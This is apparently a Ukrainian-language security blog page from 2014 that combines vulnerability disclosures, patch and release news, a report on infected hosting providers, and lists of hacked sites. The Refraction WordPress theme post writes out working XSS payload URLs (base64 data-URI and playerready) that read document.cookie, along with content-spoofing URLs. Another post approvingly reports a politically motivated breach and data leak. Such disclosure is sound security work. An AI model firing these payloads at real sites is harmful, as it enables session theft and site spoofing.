Добірка уразливостей

17:26 30.09.2014

В даній добірці уразливості в веб додатках:

  • Synology DSM multiple vulnerabilities (деталі)
  • Critical security flaws in Nagios NRPE client/server crypto (деталі)
  • Open Web Analytics Pre-Auth SQL Injection (деталі)
  • phpMyBackupPro-2.4 Cross-Site Scripting vulnerability (деталі)
  • HP Intelligent Management Center (iMC), HP IMC Branch Intelligent Management System Software Module (BIMS), and Comware Based Switches and Routers, Remote Code Execution, Disclosure of Information (деталі)

Численні уразливості в темі Refraction для WordPress

23:58 27.09.2014

Раніше я вже писав про численні уразливості в численних темах для WordPress виробництва RocketTheme. Окрім тем цих розробників я виявив подібні уразливості в багатьох темах інших розробників (в тому числі в custom темах).

Інформую про Cross-Site Scripting, Content Spoofing та Full path disclosure уразливості в темі Refraction для WordPress. Розробленої RocketTheme.

Папка теми може називатися refraction або rt_refraction_wp.

Cross-Site Scripting (WASC-08):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5jb29raWUpPC9zY3JpcHQ%2B

Ця XSS уразливість є лише в нових версіях теми з 5.x версією JW Player:

http://site/wp-content/themes/rt_refraction_wp/js/rokbox/jwplayer/jwplayer.swf?playerready=alert(document.cookie)

Content Spoofing (WASC-12):

http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&backcolor=0xFFFFFF&screencolor=0xFFFFFF
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?file=1.flv&image=1.jpg
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?config=1.xml
http://site/wp-content/themes/refraction/js/rokbox/jwplayer/jwplayer.swf?abouttext=Player&aboutlink=http://site

Full path disclosure (WASC-13):

В папці http://site/wp-content/themes/refraction/ (http://site/wp-content/themes/rt_refraction_wp/) в index.php та багатьох інших php-файлах теми є FPD, що спрацьовують при налаштуваннях PHP по замовчуванню.

Уразливі всі версії теми Refraction для WordPress.

Вийшов Google Chrome 37

22:43 27.09.2014

У серпні, 26.08.2014, через півтора місяці після виходу Google Chrome 36, вийшов Google Chrome 37.

В браузері зроблено багато нововведень. А також виправлено 50 уразливостей.

Сполученню двох уразливостей (CVE-2014-3176, CVE-2014-3177) привласнений статус критичної проблеми, що дозволяє обійти всі рівні захисту браузера і виконати код у системі, за межами sandbox-оточення. 25 уразливостям привласнений високий рівень небезпеки.

  • Релиз web-браузера Chrome 37 с устранением 50 уязвимостей (деталі)

Українські Кібер Війська взломали державний сервер РФ

20:09 27.09.2014

У серпні Українські Кібер Війська окрім того, що взломали сайт Міністерства Оборони РФ, також взломали державний сервер Російської Федерації.

09.08.2014 Українські Кібер Війська захопили російських державний сервер. Всього було отримано та викладено в Інтернет 9,13 ГБ даних в архівах. В розархівованому вигляді це 33,97 ГБ даних.

Для демонстрації спочатку я розмістив один документ, а сьогодні ще два документи з цього серверу.

Вересневий вівторок патчів від Microsoft

17:24 27.09.2014

У вересні місяці Microsoft випустила 4 патчі. Що менше ніж у серпні.

У серпневому “вівторку патчів” Microsoft випустила черговий пакет оновлень, до якого увійшло 4 бюлетенів по безпеці. Що закривають численні уразливості в програмних продуктах компанії. Один патч закриває критичну уразливість та три патчі закривають важливі уразливості.

Дані патчі стосуються всіх поточних операційних систем компанії Microsoft - Windows 2003, Vista, 2008, 7, 2008 R2, 8, 2012, RT, 8.1 та RT 8.1. А також Microsoft Lync Server, Internet Explorer та .NET Framework.

Вийшли PHP 5.4.33, 5.5.17 і 5.6

23:58 26.09.2014

У серпні, 28.08.2014, вийшов PHP 5.6. Це перший випуск нової 5.6.x гілки.

У вересні, 18.09.2014, вийшли PHP 5.4.33 і PHP 5.5.17. У версії 5.4.33 виправлено 10 багів, а у версії 5.5.17 виправлено декілька багів. Дані релізи направлені на покращення стабільності гілок 5.4.x і 5.5.x.

Жодних уразливостей в цих версіях PHP виправлено не було.

По матеріалам http://www.php.net.

Інфіковані хостери в 1 півріччі 2014 року

22:46 26.09.2014

В підсумках хакерської активності в Уанеті в 1 півріччі 2014 я зазначав, що всього за цей період я виявив 83 інфікованих сайтів в Уанеті. Дані сайти хостилися на серверах різних хостінг провайдерів, як українських, так і закордонних.

Пропоную вам звіт про результати мого дослідження хостінгів, які розміщували інфіковані сайти в першому півріччі 2014 року. Багато з цих хостінг провайдерів робили це і минулого року. Щоб і хостери і Інтернет користувачі знали найбільших розповсюджувачів шкідливого програмного забезпечення (через інфіковані сайти).

В першому півріччі цього року наступні хостінг провайдери розміщували на своїх серверах інфіковані сайти: 1GB LLC, Adamant, AlexHost, Besthosting, Bigmir-Internet, Carolina Internet, Chereda, Colocall, DCTel, DIPT, Datagroup, Delta-X, Dream Line, EVEREST, Freehost, GIGABASE, GOODNET, Golden Lines, HOST-TELECOM, HVDS, Hetzner, HostBizUa, Hvosting, ISPsystem, Infocom, Inter-Telecom, Internet Communications, LINIATEL, LNUA, MACHOSTER, MAGEAL, MiroHost, NAVIGATOR, NETART, OMNILANCE, PLUSSERVER, RTCOMM, SERVERCENTRAL, SMARTYMEDIA, SOFTLAYER, The Planet, UARNet, UTEAM, Ukrnames, Velton Telecom, Volia, XServer, Укртелеком.

Найбільші інфіковані хостери (TOP-10):

  • ISPsystem - 7 сайтів
  • Hetzner - 6 сайтів
  • Besthosting - 5 сайтів
  • Datagroup - 5 сайтів
  • Chereda - 3 сайтів
  • HostBizUa - 3 сайтів
  • Freehost - 2 сайтів
  • Inter-Telecom - 2 сайтів
  • Volia - 2 сайтів
  • XServer - 2 сайтів

Всього було виявлено хостінги 77 сайтів з 83. У випадку інших 6 сайтів визначити хостінги не вдалося, тому що в даний момент ці сайти вже не працювали (вони явно були закриті через розміщення malware на цих ресурсах). За допомогою власної системи моніторингу SecurityAlert в більшості випадків я визначив хостерів під час виявлення цих інфікованих сайтів.

Численні уразливості в Microsoft Lync Server

20:11 26.09.2014

Виявлені численні уразливості безпеки в Microsoft Lync Server.

Уразливі версії: Microsoft Lync Server 2010, Lync Server 2013.

DoS, витік інформації.

  • Microsoft Security Bulletin MS14-055 - Important Vulnerabilities in Microsoft Lync Server Could Allow Denial of Service (2990928) (деталі)

Добірка експлоітів

17:05 26.09.2014

В даній добірці експлоіти в веб додатках:

  • ManageEngine Password Manager MetadataServlet.dat SQL Injection Exploit (деталі)
  • Innovaphone PBX Admin-GUI - CSRF Vulnerability (деталі)
  • ManageEngine DeviceExpert 5.9 - User Credential Disclosure (деталі)
  • Easy Chat Server 3.1 - Stack Buffer Overflow Exploit (деталі)
  • Easy File Sharing Web Server 6.8 - Stack Buffer Overflow (деталі)

Похакані сайти №272

22:45 25.09.2014

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

  • http://dik.gov.ua (хакером Lootz) - 04.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://chasovrada.gov.ua (хакером Ali-HAwleRy) - 10.09.2014 - похаканий державний сайт, зараз сайт вже виправлений адмінами
  • http://okotele.com (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами
  • http://okotel.net (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами
  • http://ptf.kiev.ua (хакером xWARRIORtn) - 25.06.2014, зараз сайт вже виправлений адмінами